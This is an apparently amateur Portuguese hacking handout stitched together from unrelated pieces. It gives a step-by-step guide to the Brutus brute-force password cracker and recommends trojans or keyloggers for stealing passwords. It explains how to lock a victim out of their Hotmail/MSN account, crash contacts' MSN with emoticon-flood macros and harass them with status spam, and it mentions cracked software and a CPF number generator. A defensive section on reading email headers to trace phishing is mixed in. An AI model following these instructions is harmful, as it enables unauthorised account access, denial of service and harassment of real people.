escolhe o tipo de servio que quer descobrir ele coloca automaticamente a porta. Connections Quantidade de conexes simultneas que o programa far com o servidor. Quanto mais, mais rpido a senha ser descoberta. Mas isso pode gastar muita banda do seu computador e do servidor, fazendo com que acabe ficando mais lento que antes. Adapte com cuidado. Timeout Tempo que ir durar as conexes. Pode deixar como est. Abaixo voc ver algumas configuraes exclusivas de cada tipo de servidor. Por exemplo, se voc selecionar o POP3 aparecer a opo Try to stay connected for ... (tentar ficar conectado para... ), e voc pode escolher quantas tentativas o programa far antes de se desconectar e conectar de novo ou simplesmente colocar Unlimited (ilimitado). As vezes, certas configuraes de proteo bloqueiam um usurio aps ele errar a senha 3 vezes seguidas... da voc teria que configurar para o sistema tentar 2 vezes, desconectar e conectar de novo. Authentication Options (opes de autenticao) Aqui voc pode definir o usurio / usurios que quer descobrir a senha e o mtodo que ser utilizado. Use Username Marque essa opo se a senha que voc est tentando descobrir necessita de se dar um nome de usurio. Netbios para
sistemas Windows 95, 98 e ME por exemplo no necessitam de usurio, s da senha Single User Marque se voc quer descobrir a senha de um usurio somente. Se quiser de vrias pessoas, deixe desmarcado. Se o Single User estiver desmarcado, aparecer User File. Voc ter que selecionar um arquivo que contm o nome dos usurios, um em cima do outro. Assim: Usuario1 Usuario2 Usuario3 Se Single User estiver marcado, aparecer UserID. Da s colocar o nome do usurio. Depois veremos Pass Mode. Ela mostra trs tipos de senhas para serem descobertas. Wordlist, ComboList e Bruteforce. Wordlist Uma lista de palavras comumente usadas. Por exemplo, voc pode carregar uma lista de palavras com vrios nomes e tentar usar todos eles como senha. Sabendo que vrias pessoas utilizam senhas fceis (nomes de atores, datas de nascimento, etc... ) sua chance de descobrir uma senha fcil grande aqui. O Brutus vm com uma lista de palavras em ingls, mas se quiser existem listas em portugus na Internet. Ou voc pode fazer a sua prpria. Exemplo de uma lista: Amor Andreia Adriana Antonio ... ComboList a WordList melhorada. Por exemplo, certas pessoas tm o pssimo hbito de colocar um nmero na frente da senha. Ser to mais seguro assim? Exemplo: em vez de colocar marcos como senha eu coloco marcos1 . exatamente isso o que o ComboList descobre. Ele pega as senhas que esto na WordList e coloca nmeros na frente, muda para masculo, inverte a senha... tpicas coisas que uma pessoa comum faz. BruteForce o mais poderoso e o mais demorado. Com ele voc pode descobrir qualquer senha, mas pode levar milnios (!!!) . Dentro da opo Range, voc pode configurar o tamanho mnimo e mximo da senha (Min Length e Max Length) e o que ser tentado... s digitos (Digits only), letras minsculas (Lowercase Alpha), letras maisculas (Uppercase Alpha), maisculas e minsculas (Mixed Alpha), letras e nmeros (AlphaNumeric), ou todos os caracteres do teclado, incluindo smbolos como +, - e * (Full Keyspace). Por ltimo voc tambm pode customizar quais caracteres sero usados. Por ltimo: Positive Authentication Results mostra que senhas voc j descobriu, destacando o endereo e o nome do usurio. Fique atendo tambm na barra inferior do Brutus que mostra que senha est sendo tentada no momento, a quantidade de tentativas por segundo e o tempo que demora para acabar. Bom, eu espero que com esse documento fique mais fcil utilizar esse poderoso programa. Ele no o nico que faz fora bruta, existem muitos outros, mas nem todos to simples de se utilizar. Novamente digo que a chance de descoberta de senhas utilizando esse mtodo de apenas 30%, ento recomendo utilizar um trojan ou um keylogger se voc quer obter a senha rapidamente.
www.uploadtemple.com - no aceita php e mp3 - limite por arquivo 30 MB, permanncia desconhecida www.webfile.ru - limite 20MB, banda limitada, proteo por senha, site russo www.wtfhost.com - limite 25 MB, requer registro grtis www.yousendit.com - limite 1GB, suporta "resume" (recontinuao de download interrompido), limite 25 downloads ou 7 dias. www.youshareit.com - virou megaupload.com Adicionamos vrios outros sites que no tinha nessa lista, na inteno de ter uma lista mais completa :)
Noticia!
Agentes americanos querem hackers como aliados A Agncia de Segurana Nacional (NSA), o Departamento da Defesa e o FBI esto entre as agncias policiais, de espionagem e militares representadas na DefCon, um encontro internacional de piratas da informtica em Las Vegas. Os hackers e especialistas em segurana virtual eram maioria entre as mais de 6 mil pessoas que participaram da conferncia de trs dias, encerrada num domingo, segundo o fundador Jeff "Dark Tangent" Moss. O evento tambm arrecadar dinheiro para a Fundao pela Liberdade Eletrnica (Electronic Freedom Foundation), grupo legal sem fins lucrativos que defende os direitos na rede e a privacidade, to apreciados pelos hackers. Advogados da fundao lideram uma demanda que acusa a NSA de vasculhar ilegalmente correios eletrnicos e ligaes telefnicas. Tony Sager, da NSA, disse na DefCon que a agncia est compartilhando cada vez mais informaes com o pblico, na esperana de que os gnios dos computadores, estejam onde estiverem, tornem-se aliados na luta pela cibersegurana. "No sei se poderei convenc-los a confiar em mim", disse Sager. Apesar da convivncia pacfica entre piratas da informtica e agentes federais na DefCon, muitos disseram que a privacidade na Internet gera preocupaes com a segurana pblica. "O equilbrio entre segurana pblica e privada seriamente afetado, quando passa a ser possvel seguir pistas e pessoas na Internet", afirmou o hacker Len Sassaman, membro de uma equipe da K.U. Leuven University, na Blgica, que est criando um sistema annimo de correio eletrnico. "No creio que a Polcia deva ter o poder de apertar um boto e escutar quem quiser", declarou. "Acredito que a necessidade de privacidade fundamental para uma democracia que funcione". Agentes federais na DefCon informaram que sua "lista de objetivos" inclui poder identificar os responsveis por cada coisa que circula na Internet. "A NSA passou dcadas tentando fazer as coisas sozinha e isso no funcionou", opinou o hacker Roger Dingledine. "Fico feliz que tenham se dado conta de que outras pessoas podem ajudar". Sager admitiu, no entanto, que no tem certeza a respeito da melhor maneira de resolver o conflito entre segurana pblica e privacidade na Internet. "Estamos em uma poca, na qual tudo muito voltil; a guerra contra o terrorismo e a perda de informao pessoal. No tenho certeza quanto existncia de um caminho lgico agora que satisfaa a maioria da populao".
Com meu e-mail claro, para vocs ver que eu testei antes!!! Usando ele: com o e-mail da pessoa, voc deve colocar onde esta escrito "hotmaiLID" depois clik em "Freeze Accout!" ele vai conectar e vai carregar mostrando a porcertagem quando acabar ele mostrara que nem na tela ai em cima. Ateno ele so funciona si voc deixar ele aberto e "freezado"hehe, quando a pessoa dona do msn tentar conectar ela vai receber uma mensagem no msn dizendo que a senha dela estar errada ehehhe veja a imagem ai em baixo!!!
Esse outro programa diz fazer mesma coisa mas eu no tive grandes sucessos com ele:
O programa Evil Msn, vai deixa o seu msn muito mais "nervoso"!!!
Por Nlio Jaloto Esse programa eu encontrei junto com meu colega procurando outra coisa achei ele, esse programa vai deixar seu msn muito nervoso, muito bom adorei (ate por que eu adora inritar as pessoas), e bem isso que ele faz hehehehe.Uma das coisas que eu adorei nele foi o status Bomb, ele vai chamar muita atenao certo... Imagine voce com bastante contatos e varios contatos entrando e saindo no msn aquela janelinha que alerta fazendo barulho no seu pc........hehehe de iritar nao ? Pois agora a sua vez de dar o troco com status Bomb seu contato (seu e-mail) vai ficar online e offline varias vezes...... Fazendo chamar muita atenao,voce ja viu quando entra muitos contatos ao mesmo tempo?Aparece uma janelinha atraz da outra nao ?! Agora o seu contatos vai esta nessas vinte janelas ao mesmo tempo s escolher quantas vezes voce quer e clik hehehehehehehehehe.....................e podendo duplicar so escolher vinte e clikar duas vezes h...Link do programa: http://www.mediafire.com/? 4xcrz0noywz, Ai vai imagem do programa:
Colaborao da InfoGuerra. No se iluda com os endereos de e-mail e nomes que aparecem no campo do remetente das mensagens eletrnicas. Qualquer pessoa com um mnimo de conhecimento do funcionamento do servio de correio eletrnico sabe fazer com que um endereo de e-mail forjado aparea, por exemplo, com o nome do seu banco. Funciona da mesma forma como voc associa seu prprio nome a qualquer endereo de e-mail que escolhe ao assinar um provedor de Internet. Mas h uma maneira praticamente infalvel de verificar de onde partiu qualquer mensagem eletrnica, no importa quo forjada ela tenha sido: basta aprender a ler as informaes presentes no cabealho (header) do e-mail. Estas informaes normalmente no esto aparentes, mas simples chegar at elas. Os procedimentos abaixo servem para acessar o cabealho das mensagens recebidas com a verso 6.0 (a mais recente) do Outlook Express, um dos softwares para gerenciamento de e-mail mais usados no mundo. 1 - D um duplo clique na mensagem para abri-la 2 - Clique no item "Arquivo" e depois em "Propriedades" 3 - Na janela que se abre, clique na guia "Detalhes" Feito isto, voc ver um monte de smbolos e informaes aparentemente ininteligveis, mas que escondem dados preciosos para quem souber interpret-los. Abaixo est o exemplo real do cabealho de uma mensagem fraudulenta que circulou no Brasil h alguns meses, imitando uma mensagem legtima da Receita Federal (o endereo de e-mail do destinatrio foi suprimido para proteger pessoas inocentes): Return-path: Envelope-to: (suprimido) Delivery-date: Mon, 10 Mar 2003 03:55:41 -0300 Received: from mail by viper.ism.com.br with spam-scanned (Exim 3.35 #2) id (suprimido) for (suprimido); Mon, 10 Mar 2003 03:55:41 -0300 Received: from "200 228 90 152" (helo=receita.fazenda.gov.br) by viper.ism.com.br with smtp (Exim 3.35 #2) id (suprimido) for (suprimido); Mon, 10 Mar 2003 03:55:37 -0300 From: "Receita Federal - RECEITANET" To: (suprimido) Subject: Receita Federal Faa Sua Declarao de IR Sender: "Receita Federal - RECEITANET" Mime-Version: 1.0 Content-Type: text/html; charset="ISO-8859-1" Date: Thu, 9 Mar 2000 06:59:49 -0300 Reply-To: "Receita Federal - RECEITANET" Perceba que h vrias referncias ao endereo real do site da Receita. No entanto, todas estas referncias caem por terra quando se analisa o IP do remetente. IP significa Protocolo da Internet em ingls, e se refere ao nmero que est associado a uma determinada mquina conectada Internet num determinado momento. O IP nico no mundo para cada usurio, por isso no pode haver dois usurios com o mesmo IP no mesmo instante. Para encontrarmos o IP de quem nos enviou a mensagem, via de regra devemos procurar no cabealho, de baixo para cima, pela primeira linha onde est escrita a palavra "received" (recebido, em ingls). No nosso exemplo, h duas linhas com esta palavra, significando que a mensagem foi recebida por dois servidores antes de chegar ao computador do destinatrio. A primeira linha de baixo para cima (assinalada em vermelho), que a que nos interessa, traz a seguinte informao: Received: from 200 228 90 152 (helo=receita.fazenda.gov.br) Tudo que nos importa o nmero 200.228.90.152. Este o IP do computador de onde a mensagem partiu e este nmero que nos revelar a verdadeira origem do e-mail, mesmo que as outras informaes apontem para origens diferentes. Nosso prximo passo consultar bancos de dados online, que nos fornecero a resposta de que precisamos. No Brasil, todos os IPs nacionais (geralmente iniciados por 200) podem ser consultados no site www.registro.br , que o endereo do rgo que centraliza o registro de todos os domnios terminados em ".br". Se voc inserir o IP acima no site do Registro.br, ver que ele est associado a um provedor de Internet de uma cidade do interior do Par e no Receita Federal, cujos servidores centrais esto em Braslia. O IP poderia ser de um cliente do provedor, ou o servidor da empresa poderia ter sido usado revelia de seu proprietrio, devido a falhas de configurao, invaso ou outros problemas de segurana. Portanto, no se deve tirar concluses precipitadas. Mas uma coisa certa: a mensagem no partiu da Receita Federal e qualquer oferta que ela tenha trazido em nome do rgo pode ser encarada como falsa. Faa alguns testes e habitue-se a verificar o cabealho de mensagens das quais voc desconfia. Provavelmente voc se surpreender com os resultados e com a possibilidade de, em minutos, verificar por conta prpria a autenticidade de um e-mail com uma margem mnima de erro.
Como na figura abaixo voc pode ver onde deverar ir!!!hehehe a marca d'agua eu escrevi errado"apotila"hehe foi mal pessoal!!!...
Voc vai ter que desativar o "Exibir emoticons", mas por quer nlio?Por que se no o seu pode tambem pode cair e voc no quer isso no !?!?
Depois de baixado o programa EZ MACROS instale-o ele demo e so funciona 30 dias mas eu tenho o crak dele mas no funciona direito o programa depois de crakeado,....... Bom depois de instalado abra-o, ele ja vem com ums macros pr-definido mas eu costumo usar sempre o meus, tem muita coisas esse programa mas eu ainda nao fucei ele direito no blz....
Esse o programa!Agora clik onde voc esta vendo sinalizado com as setas em "Add".(Foto acima)
Ira abrir essa tela logo em seguida onde vocs devero selecionar em "Remember mouse and Keyboard events".(Foto acima)hehehe a marca d'agua eu escrevi errado"apotila"hehe foi mal pessoal!!!...
Depois voc coloque no campo que aparecer um "nome" que na verdade um atalho que toda vez que voc escrever isso, o programa ira executar o macro que voc irar cirar ainda!!!hehehe a marca d'agua eu escrevi errado"apotila"hehe foi mal pessoal!!!...
Depois onde voc pode ver o 1 coloque o seletor e "FAST" que significa Rpido para que ele mande os emotion muito rpido!!!Assim almentando as sua chance de derrubar a pessoa do msn!!!e em onde tem o 2 voc clik que ira abrir outra tela comnforme abaixo!!!
Agora com voc pode ver em 1 eu digitei uma pancada de dois pontos e parenteses assim ":):):):):):):):):):):)" por que?Por no msn algum emotion sao chamado assim, e o que acontece que quando voc mandar um monte de emotion para a pessoa voc vai fazer o msn da pessoa dar paul e travar e fazer ela sair de qualquer jeito... Depois no 2 voc clik em "Enter" que na verdade como si voc tivese apertado enter no msn mandando assim outra mensagem para vitima.....o programa faz isso para voc.... Em 3 voc finaliza clikando OK
Agora clik comforme a figura acima serve para voc ativar o programa e ele ficar na escuta so esperando voc digitar o atalho que no meu caso eu coloquie "TESTE" voc lembra?Ele vai ser minimizado para bandeja la pertinho do relogio....abra a janela do msn e conversa com alguem e quando voc digitar "TESTE" ela vai ficar com msn travadao nao vai poder fazer nada e vai cair!!! ATENAO: Seu computador vai ficar travado por um tempinho, lembrando que esse tempo em que ele vai travar por quausa do programa em que prescisa disso para tambem travar o msn do outro contato certo...entao no se preucupe e no vai falar merda comigo no orkut vlw.... por causa que muitos usuarios de pc se preucupam por causas bobas etc....ento ele travar por um tempo mas depois destrava hehehe.
programa: Como voc pode ver ele bem simples e em portugues...Ele muito facil de usar gente por isso despenso um mini tutorial at porque voc ja aprende so olhando para imagem acima no hehehehe. Para quem si interesou pelo programaegrador de cpf, e quer baixar ele, favor me contatar pelo orkut ok, o link do meu orkut esse aqui:http://www.orkut.com/Profile.aspx?uid=16422751250869153531
Bom Cheguei ao fim de mas uma tima apostila minha, e estarei comeando a minha quarta apostila s ano quem vem, que vem com varias e varias dicas de pc, umas delas (no tem haver muito com pc mas...) como enviar mensagems(SMS) para celulares GRATIS, apartir de seu computador... Ento vocs podem tirar duvidas avontade pelo meu orkut (http://www.orkut.com/Profile.aspx?uid=16422751250869153531 ).....para quem quer ser hacker siga com a cabea cara, seje curioso no tenha medo de perder os seu arquivo pessoal(por que voc fez um copia de segurana antes), varias ferramentas de busca serve para ajudar junto dessa apostila como google ou yahoo at a proscima apostila pessoal, meu nome nlio jaloto... meu e-mail nelio_jaloto@hotmail.com